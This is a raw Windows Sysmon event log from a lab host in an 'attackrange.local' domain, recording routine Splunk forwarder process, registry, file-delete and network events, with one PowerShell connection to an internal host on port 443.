15:00:31.819{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.819{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.819{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-730F-613B-3CB4-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.804{B81B27B7-730F-613B-3CB4-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.819{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0DF842579CEB05C906029EDF5808CBF,SHA256=18A669AEC569D89DEB0370F4C8B2EB2C52B0C33BE502F947D0B91C406833C459,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.288{B81B27B7-730F-613B-3BB4-03000000C801}63326044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.120{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-730F-613B-3BB4-03000000C801}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.120{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.120{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.120{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.120{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-730F-613B-3BB4-03000000C801}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.120{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.120{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-730F-613B-3BB4-03000000C801}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.105{B81B27B7-730F-613B-3BB4-03000000C801}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.887{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=695A49E9D11C874F4E9C2BA84E45F873,SHA256=F45DC30201035970962C6C541ECE0F6B6E28A2BE0C3AC0DBC3D187D42A16887E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.488{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7310-613B-3DB4-03000000C801}6184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.488{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.488{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.488{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.488{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.488{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7310-613B-3DB4-03000000C801}6184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.488{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7310-613B-3DB4-03000000C801}6184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.482{B81B27B7-7310-613B-3DB4-03000000C801}6184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.119{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3314BCE33045BF1AE8CC8B25F1EA3EBF,SHA256=1828C5336E719300E5CFEAF0532A2BEF1D105CF8B339227CE68146E7A013C45E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.119{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D7FD5AA6DF587ED8DCE97CFD8A65828,SHA256=565628CE3F00EEBE785FDA104F4DBD5C7DED7238959CFF65775E8276E345DD2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.035{B81B27B7-730F-613B-3CB4-03000000C801}53446700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:33.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB551B9540AF95BE926026AD2B5750D5,SHA256=35178A0988893B63F39E9FF12B35324951CA777F2895C000A333AAA5EC9E6369,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035342618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:33.702{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a654-0x9ae739f4) 23542300x800000000000000035342617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:33.518{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3314BCE33045BF1AE8CC8B25F1EA3EBF,SHA256=1828C5336E719300E5CFEAF0532A2BEF1D105CF8B339227CE68146E7A013C45E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:34.918{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265EFC9BE1C7B1EF1870EBBEAEEED3C9,SHA256=87550597899A577A757C509AE038762894B484DA71AAC93B35784D1D96481609,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:34.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2506DFB9F4F61165693FF9FB8E67B863,SHA256=2D8FABEB55292A103F0B91D8D5D39F2C7088656FC7D64A8294A8C9962A6625E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:35.985{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC55AD949B1CDE55E350FFDE33CC5A3,SHA256=7C10D1ED2B98D16D850A624C43EDB0EB3211A1830BC291DF0921F7ACCC310AAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:01.065{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52446-false10.0.1.12-8000- 354300x800000000000000035342622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:00.404{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52445-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 